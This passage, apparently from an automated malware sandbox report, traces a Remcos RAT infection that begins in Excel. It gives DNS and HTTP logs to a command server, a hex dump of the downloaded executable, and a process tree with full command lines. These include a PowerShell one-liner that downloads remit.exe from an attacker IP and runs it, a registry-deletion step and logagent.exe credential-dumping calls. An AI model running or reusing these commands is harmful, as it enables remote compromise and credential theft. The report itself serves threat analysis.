Sep 21, 2021 21:36:14.166543007 CEST	53	57762	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:15.515064001 CEST	55435	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:15.646485090 CEST	53	55435	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:18.729878902 CEST	50713	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:18.862173080 CEST	53	50713	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:20.175817966 CEST	56132	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:20.305274010 CEST	53	56132	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:21.631484985 CEST	58987	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:21.763289928 CEST	53	58987	8.8.8.8	192.168.2.3
Sep 21, 2021 21:36:23.091275930 CEST	56579	53	192.168.2.3	8.8.8.8
Sep 21, 2021 21:36:23.229784966 CEST	53	56579	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 21, 2021 21:34:42.564908981 CEST	192.168.2.3	8.8.8.8	0xe3af	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:34:43.700989962 CEST	192.168.2.3	8.8.8.8	0xeb67	Standard query (0)	qcisaa.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:35:17.534106970 CEST	192.168.2.3	8.8.8.8	0x41f0	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:35:23.427764893 CEST	192.168.2.3	8.8.8.8	0x9b40	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:35:24.761620045 CEST	192.168.2.3	8.8.8.8	0x469d	Standard query (0)	qcisaa.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:35:33.050353050 CEST	192.168.2.3	8.8.8.8	0x68ff	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:35:33.807349920 CEST	192.168.2.3	8.8.8.8	0xd5e6	Standard query (0)	qcisaa.sn.files.1drv.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:06.776906967 CEST	192.168.2.3	8.8.8.8	0xfdd8	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:08.222467899 CEST	192.168.2.3	8.8.8.8	0x9e77	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:09.705677986 CEST	192.168.2.3	8.8.8.8	0x1864	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:11.173659086 CEST	192.168.2.3	8.8.8.8	0x2ae	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:12.600111961 CEST	192.168.2.3	8.8.8.8	0x5413	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:14.033785105 CEST	192.168.2.3	8.8.8.8	0x2d2d	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:15.515064001 CEST	192.168.2.3	8.8.8.8	0xc8db	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:18.729878902 CEST	192.168.2.3	8.8.8.8	0xc1b2	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:20.175817966 CEST	192.168.2.3	8.8.8.8	0x27b1	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:21.631484985 CEST	192.168.2.3	8.8.8.8	0x1e7f	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:23.091275930 CEST	192.168.2.3	8.8.8.8	0x8b8b	Standard query (0)	twistednerd.dvrlists.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 21, 2021 21:34:42.587831974 CEST	8.8.8.8	192.168.2.3	0xe3af	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:34:43.773694992 CEST	8.8.8.8	192.168.2.3	0xeb67	No error (0)	qcisaa.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:34:43.773694992 CEST	8.8.8.8	192.168.2.3	0xeb67	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:35:17.672116041 CEST	8.8.8.8	192.168.2.3	0x41f0	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:35:23.448710918 CEST	8.8.8.8	192.168.2.3	0x9b40	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:35:24.802829027 CEST	8.8.8.8	192.168.2.3	0x469d	No error (0)	qcisaa.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:35:24.802829027 CEST	8.8.8.8	192.168.2.3	0x469d	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:35:33.075711012 CEST	8.8.8.8	192.168.2.3	0x68ff	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:35:33.855062008 CEST	8.8.8.8	192.168.2.3	0xd5e6	No error (0)	qcisaa.sn.files.1drv.com	sn-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:35:33.855062008 CEST	8.8.8.8	192.168.2.3	0xd5e6	No error (0)	sn-files.fe.1drv.com	odc-sn-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Sep 21, 2021 21:36:06.908086061 CEST	8.8.8.8	192.168.2.3	0xfdd8	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:08.354443073 CEST	8.8.8.8	192.168.2.3	0x9e77	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:09.837095976 CEST	8.8.8.8	192.168.2.3	0x1864	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:11.304291964 CEST	8.8.8.8	192.168.2.3	0x2ae	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:12.731333017 CEST	8.8.8.8	192.168.2.3	0x5413	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:14.166543007 CEST	8.8.8.8	192.168.2.3	0x2d2d	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:15.646485090 CEST	8.8.8.8	192.168.2.3	0xc8db	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:18.862173080 CEST	8.8.8.8	192.168.2.3	0xc1b2	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:20.305274010 CEST	8.8.8.8	192.168.2.3	0x27b1	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:21.763289928 CEST	8.8.8.8	192.168.2.3	0x1e7f	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)
Sep 21, 2021 21:36:23.229784966 CEST	8.8.8.8	192.168.2.3	0x8b8b	No error (0)	twistednerd.dvrlists.com		31.3.152.100	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

192.210.214.221

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49742	192.210.214.221	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Sep 21, 2021 21:34:33.596232891 CEST	1197	OUT	GET /remit.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1 Host: 192.210.214.221 Connection: Keep-Alive
Sep 21, 2021 21:34:33.745573044 CEST	1198	IN	HTTP/1.1 200 OK Date: Tue, 21 Sep 2021 19:34:33 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/8.0.6 Last-Modified: Tue, 21 Sep 2021 14:55:18 GMT ETag: "114c00-5cc82960aee97" Accept-Ranges: bytes Content-Length: 1133568 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 90 06 00 00 b8 0a 00 00 00 00 00 6c ac 06 00 00 10 00 00 00 b0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 11 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 66 2a 00 00 00 b0 10 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 10 00 f4 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 10 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 e7 0f 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc 81 06 00 00 10 00 00 00 82 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 f0 0c 00 00 00 a0 06 00 00 0e 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e4 eb 08 00 00 b0 06 00 00 ec 08 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 2c 39 00 00 00 a0 0f 00 00 00 00 00 00 80 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 66 2a 00 00 00 e0 0f 00 00 2c 00 00 00 80 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 10 10 00 00 00 00 00 00 ac 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 10 00 00 02 00 00 00 ac 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f4 76 00 00 00 30 10 00 00 78 00 00 00 ae 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 26 01 00 00 b0 10 00 00 26 01 00 00 26 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 11 00 00 00 00 00 00 4c 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7PEL^Bl@@f&0v .text `.itext `.data@.bss,9.idataf*,@.tls4.rdata @@.relocv0x@B.rsrc&&&@@L@@
Sep 21, 2021 21:34:33.745609999 CEST	1199	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@WideString@Variant@@
Sep 21, 2021 21:34:33.745629072 CEST	1201	IN	Data Raw: 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 df 68 38 8b 48 40 89 4a 40 df 7a 38 df 7a 30 Data Ascii: (hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l\|<x,<DD@,<xH9JtO!(Ou!$O
Sep 21, 2021 21:34:33.745649099 CEST	1202	IN	Data Raw: 6a 00 e8 76 f9 ff ff b8 00 01 00 00 f0 0f b0 25 18 a7 4f 00 74 29 6a 0a e8 60 f9 ff ff eb d2 90 90 3d 2c 0a 04 00 0f 87 0d 01 00 00 8d 98 d3 00 00 00 81 e3 00 ff ff ff 83 c3 30 84 c9 75 b2 8d 93 d0 f4 ff ff 89 d1 c1 ea 0d c1 e9 08 b8 ff ff ff ff Data Ascii: jv%Ot)j`=,0u#(Ot^#$Ot(O5 O)rO)O OXO[VW<OwFG89u!(Ou$O
Sep 21, 2021 21:34:33.745666981 CEST	1204	IN	Data Raw: 23 5e fc 8b 47 fc a8 01 74 7e 83 e0 f0 8d 2c 01 39 ea 77 74 3d 30 0b 00 00 72 0b 89 f8 51 52 e8 1b f6 ff ff 5a 59 89 c8 c1 e8 02 01 c8 31 ff 29 d0 83 d7 ff 21 f8 8d 84 02 d3 00 00 00 25 00 ff ff ff 83 c0 30 8d 55 04 29 c2 77 0b 83 24 2e f7 83 c5 Data Ascii: #^Gt~,9wt=0rQRZY1)!%0U)w$.T.z\|00rnO]_^[O1)!RZt,vP+<]_^[9vD1)
Sep 21, 2021 21:34:33.745683908 CEST	1205	IN	Data Raw: 17 8b 12 8b 0f 8b 14 91 8b 0f 89 54 81 04 8b 17 ff 0a b3 01 eb 04 40 4a 75 dd c6 05 c0 c7 4f 00 00 8b c3 5f 5e 5b c3 8b c0 55 8b ec 83 c4 e0 53 56 57 89 45 fc 8b 45 fc 8b 00 81 e8 48 b0 46 00 c1 e8 05 c1 e0 08 8b 55 08 8d b4 c2 00 48 fe ff 8d 4d Data Ascii: T@JuO_^[USVWEEHFUHMUEoEEWEG3E_E8EE}E@;E~{EEEE~*E}t
Sep 21, 2021 21:34:33.745701075 CEST	1206	IN	Data Raw: 20 68 61 73 20 6f 63 63 75 72 72 65 64 2e 20 00 00 00 00 54 68 65 20 75 6e 65 78 70 65 63 74 65 64 20 73 6d 61 6c 6c 20 62 6c 6f 63 6b 20 6c 65 61 6b 73 20 61 72 65 3a 0d 0a 00 20 62 79 74 65 73 3a 20 00 00 00 00 55 6e 6b 6e 6f 77 6e 00 53 74 72 Data Ascii: has occurred. The unexpected small block leaks are: bytes: UnknownStringThe sizes of unexpected leaked medium and large blocks are: Unexpected Memory LeakVW33JF=Otu:;vO@;wF 7u_
Sep 21, 2021 21:34:33.745718002 CEST	1208	IN	Data Raw: f9 10 7e 06 df 68 10 df 7a 10 df 7a 08 df 3a df 3c 11 c3 90 90 5d 2f 40 00 de 2f 40 00 e4 2f 40 00 eb 2f 40 00 f8 2f 40 00 fd 2f 40 00 08 30 40 00 15 30 40 00 20 30 40 00 52 df 28 8d 44 01 f8 8d 4c 0a f8 df 28 51 f7 d9 83 e2 f8 8d 4c 0a 08 5a df Data Ascii: ~hzz:<]/@/@/@/@/@/@0@0@ 0@R(DL(QLZ,<\|:Z:~.9w)9vQ,(),<Y:<ff@fB@Bf@fB@B(:@SVWUQSk;
Sep 21, 2021 21:34:33.745733976 CEST	1209	IN	Data Raw: 48 59 e8 9c fa ff ff 8b c6 e8 55 1c 00 00 c6 44 03 48 00 33 c0 5e 5b c3 8d 40 00 53 0f b7 48 04 66 81 e9 b1 d7 74 0f 49 66 83 e9 02 73 0c 8b da ff d3 8b d8 eb 1b 33 db eb 17 3d 1c a2 4f 00 74 07 3d e8 a3 4f 00 75 04 33 db eb 05 bb 67 00 00 00 85 Data Ascii: HYUDH3^[@SHftIfs3=Ot=Ou3gt[@P@%OUQSVWES#;uZjEPCPWPUuq3EAKE3EEtEU#;utE?3Eg.
Sep 21, 2021 21:34:33.745752096 CEST	1210	IN	Data Raw: 80 eb 30 80 fb 09 76 0b 80 eb 11 80 fb 05 77 d0 80 c3 0a 39 f8 77 c9 c1 e0 04 01 d8 8a 1e 46 84 db 75 d5 fe cd 75 02 f7 d8 59 31 f6 89 32 5f 5e 5b c3 8d 40 00 b9 ff 00 00 00 e8 02 00 00 00 c3 90 53 50 81 f9 ff 00 00 00 76 05 b9 ff 00 00 00 8a 1a Data Ascii: 0vw9wFuuY12_^[@SPvBt@IuZ)[S1\|M=S:@tytS<@taC<@S=}FS:@t4tS<@
Sep 21, 2021 21:34:33.893404961 CEST	1212	IN	Data Raw: c3 8b c0 53 8b d8 8b c3 e8 a6 00 00 00 8b c3 e8 3b ee ff ff 5b c3 90 83 c0 d8 8b 00 c3 8b c0 84 d2 74 08 83 c4 f0 e8 48 03 00 00 84 d2 74 0f e8 97 03 00 00 64 8f 05 00 00 00 00 83 c4 0c c3 e8 d7 03 00 00 84 d2 7e 05 e8 76 03 00 00 c3 90 85 c0 74 Data Ascii: S;[tHtd~vtQSVWK1QIYKtQ[t9t[st{4Iu9u_^[SV6Vvtu^[sr!

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6344 Parent PID: 792

General

Start time:	21:33:58
Start date:	21/09/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x240000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6584 Parent PID: 6344

General

Start time:	21:34:02
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe
Imagebase:	0x1240000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6600 Parent PID: 6584

General

Start time:	21:34:02
Start date:	21/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 6388 Parent PID: 6584

General

Start time:	21:34:35
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\system32\explorer.exe' C:\Users\Public\filesvr.exe
Imagebase:	0xf50000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 2348 Parent PID: 792

General

Start time:	21:34:37
Start date:	21/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: filesvr.exe PID: 6536 Parent PID: 2348

General

Start time:	21:34:39
Start date:	21/09/2021
Path:	C:\Users\Public\filesvr.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\filesvr.exe'
Imagebase:	0x400000
File size:	1133568 bytes
MD5 hash:	CF98D2D4D4555323842C8371DB09347E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Chronological Activities

Analysis Process: logagent.exe PID: 5572 Parent PID: 6536

General

Start time:	21:35:08
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\logagent.exe
Imagebase:	0x320000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, Author: Joe Security Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000018.00000002.456970464.0000000010590000.00000040.00000001.sdmp, Author: unknown
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 3584 Parent PID: 6536

General

Start time:	21:35:16
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 3152 Parent PID: 3584

General

Start time:	21:35:16
Start date:	21/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3464 Parent PID: 3584

General

Start time:	21:35:17
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Imagebase:	0x7ff6741d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 3888 Parent PID: 3464

General

Start time:	21:35:18
Start date:	21/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 4968 Parent PID: 6536

General

Start time:	21:35:18
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Imagebase:	0xbd0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6420 Parent PID: 4968

General

Start time:	21:35:19
Start date:	21/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 6384 Parent PID: 4968

General

Start time:	21:35:19
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	reg delete hkcu\Environment /v windir /f
Imagebase:	0xb40000
File size:	59392 bytes
MD5 hash:	CEE2A7E57DF2A159A065A34913A055C2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Srakjle.exe PID: 6172 Parent PID: 3388

General

Start time:	21:35:20
Start date:	21/09/2021
Path:	C:\Users\Public\Libraries\Srakjle\Srakjle.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
Imagebase:	0x400000
File size:	1133568 bytes
MD5 hash:	CF98D2D4D4555323842C8371DB09347E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Chronological Activities

Analysis Process: conhost.exe PID: 4908 Parent PID: 6384

General

Start time:	21:35:20
Start date:	21/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: logagent.exe PID: 5016 Parent PID: 5572

General

Start time:	21:35:21
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\dwhqbdxsbnvloizrbdml'
Imagebase:	0x320000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: logagent.exe PID: 5008 Parent PID: 5572

General

Start time:	21:35:22
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\nyuabviupwnyypwvkgznugfs'
Imagebase:	0x320000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: logagent.exe PID: 6672 Parent PID: 5572

General

Start time:	21:35:22
Start date:	21/09/2021
Path:	C:\Windows\SysWOW64\logagent.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\psztcntndefdbvkhbrmoflajdfh'
Imagebase:	0x320000
File size:	86016 bytes
MD5 hash:	E2036AC444AB4AD91EECC1A80FF7212F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: Srakjle.exe PID: 6656 Parent PID: 3388

General

Start time:	21:35:28
Start date:	21/09/2021
Path:	C:\Users\Public\Libraries\Srakjle\Srakjle.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Libraries\Srakjle\Srakjle.exe'
Imagebase:	0x400000
